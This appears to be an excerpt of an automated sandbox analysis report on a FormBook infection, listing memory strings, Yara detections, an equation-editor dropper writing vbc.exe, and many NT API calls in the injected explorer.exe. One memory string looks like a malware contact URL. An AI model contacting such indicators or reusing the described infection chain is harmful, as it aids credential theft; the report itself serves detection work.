Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.tiscali.it/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.univision.com/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.univision.com/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.walmart.com/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.walmart.com/favicon.ico
Source: explorer.exe, 00000009.00000000.2161103506.0000000003C40000.00000002.00000001.sdmp	String found in binary or memory: http://www.windows.com/pctv.
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.ya.com/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.yam.com/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www3.fnac.com/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www3.fnac.com/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&Version=2008-06-26&Operation
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://z.about.com/m/a08.ico
Source: explorer.exe, 0000000B.00000002.2352710189.0000000002F17000.00000004.00000001.sdmp	String found in binary or memory: https://casarpontocom.zendesk.com/hc/pt-br
Source: explorer.exe, 0000000B.00000002.2352710189.0000000002F17000.00000004.00000001.sdmp	String found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/es5-shim/4.5.14/es5-shim.min.js
Source: explorer.exe, 0000000B.00000002.2352710189.0000000002F17000.00000004.00000001.sdmp	String found in binary or memory: https://connect.facebook.net/en_US/fbevents.js
Source: explorer.exe, 0000000B.00000002.2352710189.0000000002F17000.00000004.00000001.sdmp	String found in binary or memory: https://oss.maxcdn.com/libs/html5shiv/3.7.0/html5shiv.js
Source: explorer.exe, 0000000B.00000002.2352710189.0000000002F17000.00000004.00000001.sdmp	String found in binary or memory: https://oss.maxcdn.com/libs/respond.js/1.3.0/respond.min.js
Source: explorer.exe, 0000000B.00000002.2352710189.0000000002F17000.00000004.00000001.sdmp	String found in binary or memory: https://plus.google.com/
Source: vbc.exe, 00000004.00000002.2153003436.000000000235D000.00000004.00000001.sdmp	String found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css
Source: explorer.exe, 0000000B.00000002.2352710189.0000000002F17000.00000004.00000001.sdmp	String found in binary or memory: https://www.casar.com
Source: explorer.exe, 0000000B.00000002.2352710189.0000000002F17000.00000004.00000001.sdmp	String found in binary or memory: https://www.casar.com/assunto/casamentos/casamentos-reais/
Source: explorer.exe, 0000000B.00000002.2352710189.0000000002F17000.00000004.00000001.sdmp	String found in binary or memory: https://www.casar.com/assunto/casamentos/decoracao-de-casamento/
Source: explorer.exe, 0000000B.00000002.2352710189.0000000002F17000.00000004.00000001.sdmp	String found in binary or memory: https://www.casar.com/assunto/cha-de-panela/
Source: explorer.exe, 0000000B.00000002.2352710189.0000000002F17000.00000004.00000001.sdmp	String found in binary or memory: https://www.casar.com/assunto/lua-de-mel-2/
Source: explorer.exe, 0000000B.00000002.2352710189.0000000002F17000.00000004.00000001.sdmp	String found in binary or memory: https://www.casar.com/assunto/noivas/dicas-para-noivas/
Source: explorer.exe, 0000000B.00000002.2352710189.0000000002F17000.00000004.00000001.sdmp	String found in binary or memory: https://www.casar.com/assunto/noivas/vestidos-de-noiva/
Source: explorer.exe, 0000000B.00000002.2352710189.0000000002F17000.00000004.00000001.sdmp	String found in binary or memory: https://www.casar.com/assunto/organizacao/
Source: explorer.exe, 0000000B.00000002.2352710189.0000000002F17000.00000004.00000001.sdmp	String found in binary or memory: https://www.cyrilgraze.com/p2io/?6lzd4R3=PONkgH6JO
Source: explorer.exe, 0000000B.00000002.2352710189.0000000002F17000.00000004.00000001.sdmp	String found in binary or memory: https://www.googletagmanager.com/gtm.js?id=
Source: explorer.exe, 0000000B.00000002.2352710189.0000000002F17000.00000004.00000001.sdmp	String found in binary or memory: https://www.googletagmanager.com/ns.html?id=GTM-N7Z9MZC
Source: explorer.exe, 0000000B.00000002.2352710189.0000000002F17000.00000004.00000001.sdmp	String found in binary or memory: https://www.youtube.com/casarpontocom

E-Banking Fraud:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000008.00000002.2206375339.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2349749079.00000000003A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2153220002.0000000003339000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2349596939.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2207492144.0000000000640000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2207429272.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2349769436.00000000003D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 8.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 00000008.00000002.2206375339.0000000000080000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.2206375339.0000000000080000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000B.00000002.2349749079.00000000003A0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000B.00000002.2349749079.00000000003A0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.2153220002.0000000003339000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.2153220002.0000000003339000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000B.00000002.2349596939.0000000000080000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000B.00000002.2349596939.0000000000080000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.2207492144.0000000000640000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.2207492144.0000000000640000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.2207429272.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.2207429272.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000B.00000002.2349769436.00000000003D0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000B.00000002.2349769436.00000000003D0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 8.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 8.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 8.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 8.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Office equation editor drops PE file

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\xele[1].exe			Jump to dropped file

Source: C:\Users\Public\vbc.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior

Source: C:\Users\Public\vbc.exe	Code function: 8_2_004181B0 NtCreateFile,	8_2_004181B0
Source: C:\Users\Public\vbc.exe	Code function: 8_2_00418260 NtReadFile,	8_2_00418260
Source: C:\Users\Public\vbc.exe	Code function: 8_2_004182E0 NtClose,	8_2_004182E0
Source: C:\Users\Public\vbc.exe	Code function: 8_2_00418390 NtAllocateVirtualMemory,	8_2_00418390
Source: C:\Users\Public\vbc.exe	Code function: 8_2_004182AC NtReadFile,	8_2_004182AC
Source: C:\Users\Public\vbc.exe	Code function: 8_2_0041838B NtAllocateVirtualMemory,	8_2_0041838B
Source: C:\Users\Public\vbc.exe	Code function: 8_2_009300C4 NtCreateFile,LdrInitializeThunk,	8_2_009300C4
Source: C:\Users\Public\vbc.exe	Code function: 8_2_00930048 NtProtectVirtualMemory,LdrInitializeThunk,	8_2_00930048
Source: C:\Users\Public\vbc.exe	Code function: 8_2_00930078 NtResumeThread,LdrInitializeThunk,	8_2_00930078
Source: C:\Users\Public\vbc.exe	Code function: 8_2_009307AC NtCreateMutant,LdrInitializeThunk,	8_2_009307AC
Source: C:\Users\Public\vbc.exe	Code function: 8_2_0092F9F0 NtClose,LdrInitializeThunk,	8_2_0092F9F0
Source: C:\Users\Public\vbc.exe	Code function: 8_2_0092F900 NtReadFile,LdrInitializeThunk,	8_2_0092F900
Source: C:\Users\Public\vbc.exe	Code function: 8_2_0092FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,	8_2_0092FAD0
Source: C:\Users\Public\vbc.exe	Code function: 8_2_0092FAE8 NtQueryInformationProcess,LdrInitializeThunk,	8_2_0092FAE8
Source: C:\Users\Public\vbc.exe	Code function: 8_2_0092FBB8 NtQueryInformationToken,LdrInitializeThunk,	8_2_0092FBB8
Source: C:\Users\Public\vbc.exe	Code function: 8_2_0092FB68 NtFreeVirtualMemory,LdrInitializeThunk,	8_2_0092FB68
Source: C:\Users\Public\vbc.exe	Code function: 8_2_0092FC90 NtUnmapViewOfSection,LdrInitializeThunk,	8_2_0092FC90
Source: C:\Users\Public\vbc.exe	Code function: 8_2_0092FC60 NtMapViewOfSection,LdrInitializeThunk,	8_2_0092FC60
Source: C:\Users\Public\vbc.exe	Code function: 8_2_0092FD8C NtDelayExecution,LdrInitializeThunk,	8_2_0092FD8C
Source: C:\Users\Public\vbc.exe	Code function: 8_2_0092FDC0 NtQuerySystemInformation,LdrInitializeThunk,	8_2_0092FDC0
Source: C:\Users\Public\vbc.exe	Code function: 8_2_0092FEA0 NtReadVirtualMemory,LdrInitializeThunk,	8_2_0092FEA0
Source: C:\Users\Public\vbc.exe	Code function: 8_2_0092FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,	8_2_0092FED0
Source: C:\Users\Public\vbc.exe	Code function: 8_2_0092FFB4 NtCreateSection,LdrInitializeThunk,	8_2_0092FFB4
Source: C:\Users\Public\vbc.exe	Code function: 8_2_009310D0 NtOpenProcessToken,	8_2_009310D0
Source: C:\Users\Public\vbc.exe	Code function: 8_2_00930060 NtQuerySection,	8_2_00930060
Source: C:\Users\Public\vbc.exe	Code function: 8_2_009301D4 NtSetValueKey,	8_2_009301D4
Source: C:\Users\Public\vbc.exe	Code function: 8_2_0093010C NtOpenDirectoryObject,	8_2_0093010C
Source: C:\Users\Public\vbc.exe	Code function: 8_2_00931148 NtOpenThread,	8_2_00931148
Source: C:\Users\Public\vbc.exe	Code function: 8_2_0092F8CC NtWaitForSingleObject,	8_2_0092F8CC
Source: C:\Users\Public\vbc.exe	Code function: 8_2_00931930 NtSetContextThread,	8_2_00931930
Source: C:\Users\Public\vbc.exe	Code function: 8_2_0092F938 NtWriteFile,	8_2_0092F938
Source: C:\Users\Public\vbc.exe	Code function: 8_2_0092FAB8 NtQueryValueKey,	8_2_0092FAB8
Source: C:\Users\Public\vbc.exe	Code function: 8_2_0092FA20 NtQueryInformationFile,	8_2_0092FA20
Source: C:\Users\Public\vbc.exe	Code function: 8_2_0092FA50 NtEnumerateValueKey,	8_2_0092FA50
Source: C:\Users\Public\vbc.exe	Code function: 8_2_0092FBE8 NtQueryVirtualMemory,	8_2_0092FBE8
Source: C:\Users\Public\vbc.exe	Code function: 8_2_0092FB50 NtCreateKey,	8_2_0092FB50
Source: C:\Users\Public\vbc.exe	Code function: 8_2_0092FC30 NtOpenProcess,	8_2_0092FC30
Source: C:\Users\Public\vbc.exe	Code function: 8_2_00930C40 NtGetContextThread,	8_2_00930C40
Source: C:\Users\Public\vbc.exe	Code function: 8_2_0092FC48 NtSetInformationFile,	8_2_0092FC48
Source: C:\Users\Public\vbc.exe	Code function: 8_2_00931D80 NtSuspendThread,	8_2_00931D80
Source: C:\Users\Public\vbc.exe	Code function: 8_2_0092FD5C NtEnumerateKey,	8_2_0092FD5C
Source: C:\Users\Public\vbc.exe	Code function: 8_2_0092FE24 NtWriteVirtualMemory,	8_2_0092FE24
Source: C:\Users\Public\vbc.exe	Code function: 8_2_0092FFFC NtCreateProcessEx,	8_2_0092FFFC
Source: C:\Users\Public\vbc.exe	Code function: 8_2_0092FF34 NtQueueApcThread,	8_2_0092FF34
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_02A200C4 NtCreateFile,LdrInitializeThunk,	11_2_02A200C4
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_02A207AC NtCreateMutant,LdrInitializeThunk,	11_2_02A207AC
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_02A1FAB8 NtQueryValueKey,LdrInitializeThunk,	11_2_02A1FAB8
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_02A1FAE8 NtQueryInformationProcess,LdrInitializeThunk,	11_2_02A1FAE8
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_02A1FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,	11_2_02A1FAD0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_02A1FBB8 NtQueryInformationToken,LdrInitializeThunk,	11_2_02A1FBB8
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_02A1FB68 NtFreeVirtualMemory,LdrInitializeThunk,	11_2_02A1FB68
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_02A1FB50 NtCreateKey,LdrInitializeThunk,	11_2_02A1FB50
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_02A1F9F0 NtClose,LdrInitializeThunk,	11_2_02A1F9F0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_02A1F900 NtReadFile,LdrInitializeThunk,	11_2_02A1F900
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_02A1FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,	11_2_02A1FED0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_02A1FFB4 NtCreateSection,LdrInitializeThunk,	11_2_02A1FFB4
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_02A1FC60 NtMapViewOfSection,LdrInitializeThunk,	11_2_02A1FC60
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_02A1FD8C NtDelayExecution,LdrInitializeThunk,	11_2_02A1FD8C
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_02A1FDC0 NtQuerySystemInformation,LdrInitializeThunk,	11_2_02A1FDC0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_02A210D0 NtOpenProcessToken,	11_2_02A210D0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_02A20060 NtQuerySection,	11_2_02A20060
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_02A20078 NtResumeThread,	11_2_02A20078
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_02A20048 NtProtectVirtualMemory,	11_2_02A20048
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_02A201D4 NtSetValueKey,	11_2_02A201D4
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_02A2010C NtOpenDirectoryObject,	11_2_02A2010C
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_02A21148 NtOpenThread,	11_2_02A21148
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_02A1FA20 NtQueryInformationFile,	11_2_02A1FA20
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_02A1FA50 NtEnumerateValueKey,	11_2_02A1FA50
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_02A1FBE8 NtQueryVirtualMemory,	11_2_02A1FBE8
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_02A1F8CC NtWaitForSingleObject,	11_2_02A1F8CC
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_02A21930 NtSetContextThread,	11_2_02A21930
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_02A1F938 NtWriteFile,	11_2_02A1F938
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_02A1FEA0 NtReadVirtualMemory,	11_2_02A1FEA0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_02A1FE24 NtWriteVirtualMemory,	11_2_02A1FE24
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_02A1FFFC NtCreateProcessEx,	11_2_02A1FFFC
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_02A1FF34 NtQueueApcThread,	11_2_02A1FF34
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_02A1FC90 NtUnmapViewOfSection,	11_2_02A1FC90
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_02A1FC30 NtOpenProcess,	11_2_02A1FC30
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_02A20C40 NtGetContextThread,	11_2_02A20C40
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_02A1FC48 NtSetInformationFile,	11_2_02A1FC48
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_02A21D80 NtSuspendThread,	11_2_02A21D80
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_02A1FD5C NtEnumerateKey,	11_2_02A1FD5C
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_000981B0 NtCreateFile,	11_2_000981B0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_00098260 NtReadFile,	11_2_00098260
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_000982E0 NtClose,	11_2_000982E0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_00098390 NtAllocateVirtualMemory,	11_2_00098390
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_000982AC NtReadFile,	11_2_000982AC
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_0009838B NtAllocateVirtualMemory,	11_2_0009838B

Source: C:\Users\Public\vbc.exe	Code function: 4_2_00375078	4_2_00375078
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003710EB	4_2_003710EB
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00377108	4_2_00377108
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003761F0	4_2_003761F0
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003722A0	4_2_003722A0
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00370308	4_2_00370308
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00372740	4_2_00372740
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00375808	4_2_00375808
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00379858	4_2_00379858
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00371D59	4_2_00371D59
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00372078	4_2_00372078
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00372088	4_2_00372088
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00379220	4_2_00379220
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00372290	4_2_00372290
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0037A2EA	4_2_0037A2EA
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00379440	4_2_00379440
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0037F440	4_2_0037F440
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00374490	4_2_00374490
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003714CF	4_2_003714CF
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003796A0	4_2_003796A0
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0037273C	4_2_0037273C
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00378E88	4_2_00378E88
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00377FE8	4_2_00377FE8
Source: C:\Users\Public\vbc.exe	Code function: 4_2_004F2A68	4_2_004F2A68
Source: C:\Users\Public\vbc.exe	Code function: 4_2_004F0048	4_2_004F0048
Source: C:\Users\Public\vbc.exe	Code function: 4_2_004F2640	4_2_004F2640
Source: C:\Users\Public\vbc.exe	Code function: 4_2_004F2C78	4_2_004F2C78
Source: C:\Users\Public\vbc.exe	Code function: 4_2_004F2C2C	4_2_004F2C2C
Source: C:\Users\Public\vbc.exe	Code function: 4_2_004F2CC7	4_2_004F2CC7
Source: C:\Users\Public\vbc.exe	Code function: 8_2_00401030	8_2_00401030
Source: C:\Users\Public\vbc.exe	Code function: 8_2_0041B8B1	8_2_0041B8B1
Source: C:\Users\Public\vbc.exe	Code function: 8_2_0041B963	8_2_0041B963
Source: C:\Users\Public\vbc.exe	Code function: 8_2_00408C4B	8_2_00408C4B
Source: C:\Users\Public\vbc.exe	Code function: 8_2_00408C50	8_2_00408C50
Source: C:\Users\Public\vbc.exe	Code function: 8_2_0041B493	8_2_0041B493
Source: C:\Users\Public\vbc.exe	Code function: 8_2_0041B496	8_2_0041B496
Source: C:\Users\Public\vbc.exe	Code function: 8_2_0041C539	8_2_0041C539
Source: C:\Users\Public\vbc.exe	Code function: 8_2_00402D89	8_2_00402D89
Source: C:\Users\Public\vbc.exe	Code function: 8_2_00402D90	8_2_00402D90
Source: C:\Users\Public\vbc.exe	Code function: 8_2_0041CE85	8_2_0041CE85
Source: C:\Users\Public\vbc.exe	Code function: 8_2_0041BF12	8_2_0041BF12
Source: C:\Users\Public\vbc.exe	Code function: 8_2_0041C795	8_2_0041C795
Source: C:\Users\Public\vbc.exe	Code function: 8_2_00402FB0	8_2_00402FB0
Source: C:\Users\Public\vbc.exe	Code function: 8_2_0093E0C6	8_2_0093E0C6
Source: C:\Users\Public\vbc.exe	Code function: 8_2_0096D005	8_2_0096D005
Source: C:\Users\Public\vbc.exe	Code function: 8_2_0095905A	8_2_0095905A
Source: C:\Users\Public\vbc.exe	Code function: 8_2_00943040	8_2_00943040
Source: C:\Users\Public\vbc.exe	Code function: 8_2_009BD06D	8_2_009BD06D
Source: C:\Users\Public\vbc.exe	Code function: 8_2_009CD13F	8_2_009CD13F
Source: C:\Users\Public\vbc.exe	Code function: 8_2_0093E2E9	8_2_0093E2E9
Source: C:\Users\Public\vbc.exe	Code function: 8_2_009E1238	8_2_009E1238
Source: C:\Users\Public\vbc.exe	Code function: 8_2_009E63BF	8_2_009E63BF
Source: C:\Users\Public\vbc.exe	Code function: 8_2_009663DB	8_2_009663DB
Source: C:\Users\Public\vbc.exe	Code function: 8_2_0093F3CF	8_2_0093F3CF
Source: C:\Users\Public\vbc.exe	Code function: 8_2_00942305	8_2_00942305
Source: C:\Users\Public\vbc.exe	Code function: 8_2_00947353	8_2_00947353
Source: C:\Users\Public\vbc.exe	Code function: 8_2_0098A37B	8_2_0098A37B
Source: C:\Users\Public\vbc.exe	Code function: 8_2_00975485	8_2_00975485
Source: C:\Users\Public\vbc.exe	Code function: 8_2_00951489	8_2_00951489
Source: C:\Users\Public\vbc.exe	Code function: 8_2_009C443E	8_2_009C443E
Source: C:\Users\Public\vbc.exe	Code function: 8_2_0097D47D	8_2_0097D47D
Source: C:\Users\Public\vbc.exe	Code function: 8_2_009E35DA	8_2_009E35DA
Source: C:\Users\Public\vbc.exe	Code function: 8_2_0095C5F0	8_2_0095C5F0
Source: C:\Users\Public\vbc.exe	Code function: 8_2_009C05E3	8_2_009C05E3
Source: C:\Users\Public\vbc.exe	Code function: 8_2_0094351F	8_2_0094351F
Source: C:\Users\Public\vbc.exe	Code function: 8_2_00986540	8_2_00986540
Source: C:\Users\Public\vbc.exe	Code function: 8_2_00944680	8_2_00944680
Source: C:\Users\Public\vbc.exe	Code function: 8_2_0094E6C1	8_2_0094E6C1
Source: C:\Users\Public\vbc.exe	Code function: 8_2_0098A634	8_2_0098A634
Source: C:\Users\Public\vbc.exe	Code function: 8_2_009E2622	8_2_009E2622
Source: C:\Users\Public\vbc.exe	Code function: 8_2_009C579A	8_2_009C579A
Source: C:\Users\Public\vbc.exe	Code function: 8_2_0094C7BC	8_2_0094C7BC
Source: C:\Users\Public\vbc.exe	Code function: 8_2_009757C3	8_2_009757C3
Source: C:\Users\Public\vbc.exe	Code function: 8_2_009BF8C4	8_2_009BF8C4
Source: C:\Users\Public\vbc.exe	Code function: 8_2_009DF8EE	8_2_009DF8EE
Source: C:\Users\Public\vbc.exe	Code function: 8_2_0094C85C	8_2_0094C85C
Source: C:\Users\Public\vbc.exe	Code function: 8_2_0096286D	8_2_0096286D
Source: C:\Users\Public\vbc.exe	Code function: 8_2_009E098E	8_2_009E098E
Source: C:\Users\Public\vbc.exe	Code function: 8_2_009429B2	8_2_009429B2
Source: C:\Users\Public\vbc.exe	Code function: 8_2_009569FE	8_2_009569FE
Source: C:\Users\Public\vbc.exe	Code function: 8_2_009C5955	8_2_009C5955
Source: C:\Users\Public\vbc.exe	Code function: 8_2_009C394B	8_2_009C394B
Source: C:\Users\Public\vbc.exe	Code function: 8_2_009F3A83	8_2_009F3A83
Source: C:\Users\Public\vbc.exe	Code function: 8_2_009ECBA4	8_2_009ECBA4
Source: C:\Users\Public\vbc.exe	Code function: 8_2_0093FBD7	8_2_0093FBD7
Source: C:\Users\Public\vbc.exe	Code function: 8_2_009CDBDA	8_2_009CDBDA
Source: C:\Users\Public\vbc.exe	Code function: 8_2_009C6BCB	8_2_009C6BCB
Source: C:\Users\Public\vbc.exe	Code function: 8_2_00967B00	8_2_00967B00
Source: C:\Users\Public\vbc.exe	Code function: 8_2_009E2C9C	8_2_009E2C9C
Source: C:\Users\Public\vbc.exe	Code function: 8_2_009CAC5E	8_2_009CAC5E
Source: C:\Users\Public\vbc.exe	Code function: 8_2_009DFDDD	8_2_009DFDDD
Source: C:\Users\Public\vbc.exe	Code function: 8_2_00970D3B	8_2_00970D3B
Source: C:\Users\Public\vbc.exe	Code function: 8_2_0094CD5B	8_2_0094CD5B
Source: C:\Users\Public\vbc.exe	Code function: 8_2_00972E2F	8_2_00972E2F
Source: C:\Users\Public\vbc.exe	Code function: 8_2_0095EE4C	8_2_0095EE4C
Source: C:\Users\Public\vbc.exe	Code function: 8_2_009DCFB1	8_2_009DCFB1
Source: C:\Users\Public\vbc.exe	Code function: 8_2_009B2FDC	8_2_009B2FDC
Source: C:\Users\Public\vbc.exe	Code function: 8_2_009CBF14	8_2_009CBF14
Source: C:\Users\Public\vbc.exe	Code function: 8_2_00950F3F	8_2_00950F3F
Source: C:\Users\Public\vbc.exe	Code function: 8_2_0096DF7C	8_2_0096DF7C
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_02A2E2E9	11_2_02A2E2E9
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_02AD1238	11_2_02AD1238
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_02AD63BF	11_2_02AD63BF
